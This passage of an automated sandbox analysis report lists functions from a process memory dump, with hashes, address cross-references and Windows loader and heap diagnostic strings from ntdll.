                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: 489bbe68581e4e6674066f31b7b0fa9c1fd70c5dcb128d813a14a37d4fb03eac
                • Instruction ID: 622c7c8dc5b7dabb351649dc2d8cffd50243312b3eb966232b8eee4c13ddd9d5
                • Opcode Fuzzy Hash: 489bbe68581e4e6674066f31b7b0fa9c1fd70c5dcb128d813a14a37d4fb03eac
                • Instruction Fuzzy Hash: ECF15B76D10229EFCB16DF99C984AEEBBF9FF58614F15006AE605E7220D7709E018B90
                Function 013E70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                • API String ID: 0-3178619729
                • Opcode ID: c806418f615b283b165c26557b1d37c21a9e3eaeec09d4d27602623ed2d4a0b7
                • Instruction ID: 86ab2e43cc42c6d3c307e3699f4caa44678f0b6d199673487f6a1bac54a7db54
                • Opcode Fuzzy Hash: c806418f615b283b165c26557b1d37c21a9e3eaeec09d4d27602623ed2d4a0b7
                • Instruction Fuzzy Hash: B4139D70E0076ACFDB25CF68C4987A9BBF1BF59308F1481A9D949AB381D734A945CF90
                Function 013E1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                • API String ID: 0-3570731704
                • Opcode ID: 9e85c504527d0763c95377e89f37e659e5b4a3f50def42a1b6bedb87fc2db47c
                • Instruction ID: 424686195f79da4a2b1e5e8ea0625e7ee9d90bc422c45c3de5331a080be75a05
                • Opcode Fuzzy Hash: 9e85c504527d0763c95377e89f37e659e5b4a3f50def42a1b6bedb87fc2db47c
                • Instruction Fuzzy Hash: 26923971A00369CFEB25CB18C844BAAB7F6BF49314F1581EAD949AB391D7709E80CF51
                Function 013DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: ec0da0f6c6ff8f967efb078b039f55999c65b8f5fa433311e21f10d625fc06c7
                • Instruction ID: 75daf2af87d6ed034b0a823fb065e4a76fc74d46240c3b918dd8826212213561
                • Opcode Fuzzy Hash: ec0da0f6c6ff8f967efb078b039f55999c65b8f5fa433311e21f10d625fc06c7
                • Instruction Fuzzy Hash: B5C1AB72108386CFD711CF58D244B6ABBF4BF88708F00886AF9959B761E774CA49CB52
                Function 01408402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                Download Yara Rule
                Strings
                • LdrpInitializeProcess, xrefs: 01408422
                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0140855E
                • @, xrefs: 01408591
                • minkernel\ntdll\ldrinit.c, xrefs: 01408421
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1918872054
                • Opcode ID: 99c707eff6d29b6ab5c2b3e3112de7c7347494e323ea08cc94b106f46d27723d
                • Instruction ID: 11d027f14114dd09efc514b53923982e9829929de29c9e34dd8e9f13735a3d16
                • Opcode Fuzzy Hash: 99c707eff6d29b6ab5c2b3e3112de7c7347494e323ea08cc94b106f46d27723d
                • Instruction Fuzzy Hash: 8F918F71908346AFE722DF66C941FABBAE8FB94644F40093FF684961A1E374D904CB52
                Function 013D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                Download Yara Rule
                Strings
                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01430FE5
                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01431028
                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0143106B
                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014310AE
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                • API String ID: 0-1468400865
                • Opcode ID: e92cc7863a3913fcf951d2cecf083768ffc4247ce880a368dd244ed3988baff0
                • Instruction ID: 26db9f3cd9574c2bd47c922d6f96f53e4dad9827cc4f97f7108138693fd386d5
                • Opcode Fuzzy Hash: e92cc7863a3913fcf951d2cecf083768ffc4247ce880a368dd244ed3988baff0
                • Instruction Fuzzy Hash: DE71E1B2904305DFCB21DF19D885B9B7FA9AFA4768F40046EF9488B256D334D588CBD2
                Function 014811A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                • API String ID: 0-336120773
                • Opcode ID: 0369178d07abf50414048715a52172355f75543fb096e2896ef77910249bc88b
                • Instruction ID: 2fff4a6a781aed047e576b579a02aa39d9fc6eccc88a0f6a3a19e50e5daa22bc
                • Opcode Fuzzy Hash: 0369178d07abf50414048715a52172355f75543fb096e2896ef77910249bc88b
                • Instruction Fuzzy Hash: D931CF71200211EFD711EB98C885FABB7E8EF05E68F54005BF501EB3A1D670AD46CB65
                Function 013F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                Download Yara Rule
                Strings
                • apphelp.dll, xrefs: 013F2462
                • minkernel\ntdll\ldrinit.c, xrefs: 0143A9A2
                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0143A992
                • LdrpDynamicShimModule, xrefs: 0143A998
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-176724104
                • Opcode ID: c67b3f07e75505e2f8de2f11a1833da3d49c6eb721a9303cc28ac42e5953fbab
                • Instruction ID: a15ed1e6c932263416e7b98e29f658905824a525de090d04c58004fa66762d5d
                • Opcode Fuzzy Hash: c67b3f07e75505e2f8de2f11a1833da3d49c6eb721a9303cc28ac42e5953fbab
                • Instruction Fuzzy Hash: D2311576640201EFDB219F5D9885AAB7BB4FBC8B08F26805EE941B7375C7B09842C790
                Function 013C9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                • API String ID: 0-1391187441
                • Opcode ID: b6c83d2504276b5050292fe7a475c89ac5ccef65201c7a2a31ce65a1662891bc
                • Instruction ID: 964fb6398c5e7f790743ee63ad236b9505c9480c679b72a79632941f7f5961b0
                • Opcode Fuzzy Hash: b6c83d2504276b5050292fe7a475c89ac5ccef65201c7a2a31ce65a1662891bc
                • Instruction Fuzzy Hash: BF31B232600115EFCB01DB49C886FAAB7F8EF95B68F15405AE915A72A1D770ED80CB60
                Function 014794E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: $ $0
                • API String ID: 0-3352262554
                • Opcode ID: a74b56282e9082fa578ed256585e0429d32600e543aa35e9dfa2817d4ac16d81
                • Instruction ID: af962593d26b792d892f827c492e064c9da8e47828dd499c8a9d5638b4c91e39
                • Opcode Fuzzy Hash: a74b56282e9082fa578ed256585e0429d32600e543aa35e9dfa2817d4ac16d81
                • Instruction Fuzzy Hash: 033223B16083818FE760CF68C584B9BFBE5BB88318F04492EF59987360D775E949CB52
                Function 013D1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                Download Yara Rule
                Strings
                • HEAP: , xrefs: 013D1596
                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 013D1728
                • HEAP[%wZ]: , xrefs: 013D1712
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                • API String ID: 0-3178619729
                • Opcode ID: d7de5b31d71a67a188f2f8c322d4dd8b4e97fcf11665c352442574185a4d4f6c
                • Instruction ID: d2a073376ad747d94ce0202e91554bac27f553a3d5cb59fddf7665f7ab2e12fd
                • Opcode Fuzzy Hash: d7de5b31d71a67a188f2f8c322d4dd8b4e97fcf11665c352442574185a4d4f6c
                • Instruction Fuzzy Hash: 21E10132A042459FDB29CF2CD450BBABBF6AF84318F58845EE996CB256D734E844CB50
                Function 013CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: ebafd287acee9f738076947d060757641ebddc12d30be6a39753e6518fe95e5b
                • Instruction ID: dc6dbd0de4ec8c445b8f00d5a919a170f7e91820a7c77b3bdf6b4273dfc86c0e
                • Opcode Fuzzy Hash: ebafd287acee9f738076947d060757641ebddc12d30be6a39753e6518fe95e5b
                • Instruction Fuzzy Hash: 2EA14D719016399BDB319F68CC88BAEB7B8EF44714F5001EAE909A7260E7359EC5CF50
                Function 013DB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                • API String ID: 0-373624363
                • Opcode ID: d287333cdc72955a121ae0d86ff3e94b749616fcd06208e7ce7a00add49b87e8
                • Instruction ID: d4ee3dfeaf17e120716582c3a0612d68e39b510f572c9537cf3f91d2f27db377
                • Opcode Fuzzy Hash: d287333cdc72955a121ae0d86ff3e94b749616fcd06208e7ce7a00add49b87e8
                • Instruction Fuzzy Hash: E091E672A04209CFEB21CF58E4407EEB7B5FF46368F158196E911AB3A4D7789941CB90
                Function 0140909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: %$&$@
                • API String ID: 0-1537733988
                • Opcode ID: 1a022275392d04f2e8bf4b95088988051345065ae105c407eb2a00a1d719e6ec
                • Instruction ID: 85f1833643d3006f4e5ccdce2e33795cc16bc6efebd1138f82cf5ee90789030a
                • Opcode Fuzzy Hash: 1a022275392d04f2e8bf4b95088988051345065ae105c407eb2a00a1d719e6ec
                • Instruction Fuzzy Hash: F77194706083029FD716DF2AC580A2BBBE5BFD5618F108A2FE599472F2D730D906CB56
                Function 013F15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                Download Yara Rule
                Strings
                • LdrpCompleteMapModule, xrefs: 0143A590
                • Could not validate the crypto signature for DLL %wZ, xrefs: 0143A589
                • minkernel\ntdll\ldrmap.c, xrefs: 0143A59A
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                • API String ID: 0-1676968949
                • Opcode ID: b1ac9fb3fa4e9575612f774372c26e4a82060205f57371fca555d3967bc01176
                • Instruction ID: a71256f6d5a37d4aa0941aea453f02864d6bafc99ffa7725fa546c5888d915e6
                • Opcode Fuzzy Hash: b1ac9fb3fa4e9575612f774372c26e4a82060205f57371fca555d3967bc01176
                • Instruction Fuzzy Hash: EC51E571600745DBE722CB5CD944B667BE8BF44728F2801AAEF919B7E2D774E841C740
                Function 013C758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                • API String ID: 0-1151232445
                • Opcode ID: a48cc22b7bdbcfb27a8b8d937e1351c587d05606111a84caeac819f1f9ecbb7b
                • Instruction ID: 3ca673c6ef0b4fb2148e404b7472343323edf3fd71735de1234b04e522b5ae9c
                • Opcode Fuzzy Hash: a48cc22b7bdbcfb27a8b8d937e1351c587d05606111a84caeac819f1f9ecbb7b
                • Instruction Fuzzy Hash: F74108703002508FEF35CA1DC0A4BB67B949F01B68F6A446FDD468BBA6D678DC85CB52
                Function 0148C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                Download Yara Rule
                Strings
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0148C1C5
                • @, xrefs: 0148C1F1
                • PreferredUILanguages, xrefs: 0148C212
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: 59672e74670cf73deb2b45c8b1c3b121d183c8088c917d3996430dfd84b5b928
                • Instruction ID: ce01ce3e94612a465c97081a4b05c74e6536cf5836169dd2b744f9962c39ad71
                • Opcode Fuzzy Hash: 59672e74670cf73deb2b45c8b1c3b121d183c8088c917d3996430dfd84b5b928
                • Instruction Fuzzy Hash: 23417271E00219EBDF11EBD8C881FEEBBB8AB14714F14406BE609A72A0D7749A44CB60
                Function 01464144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                • API String ID: 0-1373925480
                • Opcode ID: 7e056e68f84603be4cb01de2020ac5f8f50a09c5b0d1c116fd8cb44afe6d21b2
                • Instruction ID: 6bb8cd7c5922262293cc5af3165d9681ac4be66215edcb6b7b1fe6e4d4a07fc8
                • Opcode Fuzzy Hash: 7e056e68f84603be4cb01de2020ac5f8f50a09c5b0d1c116fd8cb44afe6d21b2
                • Instruction Fuzzy Hash: 8941E471A04358CBEF25DBD9C844BAEBBB8FF55348F28045BD901EB7A1D6358941CB12
                Function 014033A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                Download Yara Rule
                Strings
                • RtlCreateActivationContext, xrefs: 014429F9
                • Actx , xrefs: 014033AC
                • SXS: %s() passed the empty activation context data, xrefs: 014429FE
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                • API String ID: 0-859632880
                • Opcode ID: 2ea392326b8bb56e51bd1b6970d3045208deb75ad9bd15635a69596c58e482d3
                • Instruction ID: a8126c7ac89b77cf0a3c3c605e7028a3c72baf92768b673ac412fef85126f76c
                • Opcode Fuzzy Hash: 2ea392326b8bb56e51bd1b6970d3045208deb75ad9bd15635a69596c58e482d3
                • Instruction Fuzzy Hash: 3231F3366002059FEB26DE5AD884F96BBA4BB54714F06447AFE059F3A1D770D841C790
                Function 0145B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                Download Yara Rule
                Strings
                • GlobalFlag, xrefs: 0145B68F
                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0145B632
                • @, xrefs: 0145B670
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                • API String ID: 0-4192008846
                • Opcode ID: a92b7dbd3d612fa7ffbbd3d02f607add76a2503aa8abdbd07654955945249737
                • Instruction ID: b97588165f2a69ee4aea876313c8ac6eef6675f2104fdd62c8dfb0c8c454a914
                • Opcode Fuzzy Hash: a92b7dbd3d612fa7ffbbd3d02f607add76a2503aa8abdbd07654955945249737
                • Instruction Fuzzy Hash: 50313DB1900219AFDB10EF99CC90AEFBBBDEB54744F14046AEA05E7251D7749A04CBA4
                Function 01411270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                Download Yara Rule
                Strings
                • BuildLabEx, xrefs: 0141130F
                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0141127B
                • @, xrefs: 014112A5
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                • API String ID: 0-3051831665
                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                • Instruction ID: df98994081da786fbca1b995e2097a3bea6d7a42ef616763c28ff353ffbf97fe
                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                • Instruction Fuzzy Hash: 4A31A17290061DABEB11EFA6CD44EEFBBBDEB94B14F104026E604A72B4D730DA059B50
                Function 014520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                Download Yara Rule
                Strings
                • LdrpInitializationFailure, xrefs: 014520FA
                • Process initialization failed with status 0x%08lx, xrefs: 014520F3
                • minkernel\ntdll\ldrinit.c, xrefs: 01452104
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: 97ce487adba0dc40c08fd5aaa7ed6fc35ca61e2e6faf7d3a43d468907d9be2d1
                • Instruction ID: ce6d35e73f01e1738ee10a4a09b4d203cae8480b59d5291a37021fcc67e068ae
                • Opcode Fuzzy Hash: 97ce487adba0dc40c08fd5aaa7ed6fc35ca61e2e6faf7d3a43d468907d9be2d1
                • Instruction Fuzzy Hash: 8FF0A475640208AFE724DA4DDC46FDB3B68EB50B58F14405AFB047B796D2F0A5008A91
                Function 013E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: eaaba63c464a6144ec07100fdbc4b440b6e2c8667b6f182c304bd22297ed0cda
                • Instruction ID: be2573b3e5c03692fac5c8dab51cb2e0241eb96f98540c2f267913c5dad968b4
                • Opcode Fuzzy Hash: eaaba63c464a6144ec07100fdbc4b440b6e2c8667b6f182c304bd22297ed0cda
                • Instruction Fuzzy Hash: 7C716E71A0021A9FDB05DF99C984BAEB7F8FF58704F14406AE905E72A1EA34ED01CB60
                Function 013E52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$@
                • API String ID: 0-149943524
                • Opcode ID: 86bb120daf3fe905877e0f6acf10510480f1494c296bd48a8aabc46af09693cb
                • Instruction ID: bdf8443f233efd3e17aa83affd30ac17a777484127792ba2bb5e7ffdc8608cea
                • Opcode Fuzzy Hash: 86bb120daf3fe905877e0f6acf10510480f1494c296bd48a8aabc46af09693cb
                • Instruction Fuzzy Hash: E1329B786083229BD724CF18C488B3FBBE5AF8875CF15491EFA85972A0E774D944CB52
                Function 0149A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 037be614591be1b630e5c9db73ba27d55116e02d643c1898828cb7f618c656c0
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: FDC1B3312043469BEB25CF29C845B6BBFE5AFD4318F284A2EF695C72A0D774D905CB81
                Function 013DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                Download Yara Rule
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 013DA2FB
                • RtlpResUltimateFallbackInfo Exit, xrefs: 013DA309
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: 637913d2417868599f961baf76b367e6f5d372ce410ce7b72db32b211105573e
                • Instruction ID: 12e1065ee562f68622b960f03442e414a6f39dd2ebe38028bd69be1667e10554
                • Opcode Fuzzy Hash: 637913d2417868599f961baf76b367e6f5d372ce410ce7b72db32b211105573e
                • Instruction Fuzzy Hash: 6A41DE32A04659DBDB15CF5DD940B6E7BB5FF89308F2440AAE900DB7A1EBB5D900CB50
                Function 014635BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                • API String ID: 0-118005554
                • Opcode ID: 45f6ab684c20ae001cfa1b3fa1494c4514bc42d2c274d3bc70d8fc2079ffe1ef
                • Instruction ID: 29f51dc8933e39210d548b896ebe2ecee9d7c45174c9c7c9f9b2fb3d072de625
                • Opcode Fuzzy Hash: 45f6ab684c20ae001cfa1b3fa1494c4514bc42d2c274d3bc70d8fc2079ffe1ef
                • Instruction Fuzzy Hash: 8B319D312087829BD321DF29D458B2AB7E8FF95718F04086AE9588B3E1E670D905CB53
                Function 0140329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: .Local\$@
                • API String ID: 0-380025441
                • Opcode ID: 93ca8e5e85173fec95ddbe9e79ec21d16b7e6ef6dcc9a15a52d0048c07095d4d
                • Instruction ID: 55bd2bb6cb883b466636956bbe641e08e67adae5f371e5d8013dad9c8e3662ec
                • Opcode Fuzzy Hash: 93ca8e5e85173fec95ddbe9e79ec21d16b7e6ef6dcc9a15a52d0048c07095d4d
                • Instruction Fuzzy Hash: 6C31A172508305AFD322DF2AC580A5BBFE8FB95654F44092FF995833A0DA30DD05CB92
                Function 0140A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Cleanup Group$Threadpool!
                • API String ID: 2994545307-4008356553
                • Opcode ID: 50eeb96a403db0983f8c5fcd970de7503e68b0b801c937818d274c1443c7ccd8
                • Instruction ID: c5a7c8f52610cb3853f34cea278cf4fb3c764a7d076b414b06d5964eadc1fea1
                • Opcode Fuzzy Hash: 50eeb96a403db0983f8c5fcd970de7503e68b0b801c937818d274c1443c7ccd8
                • Instruction Fuzzy Hash: AD01ADB2240700AFD312DF25CD45B2677F8E795719F05893EA68CCB2A0E374D805CB46
                Function 013D7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
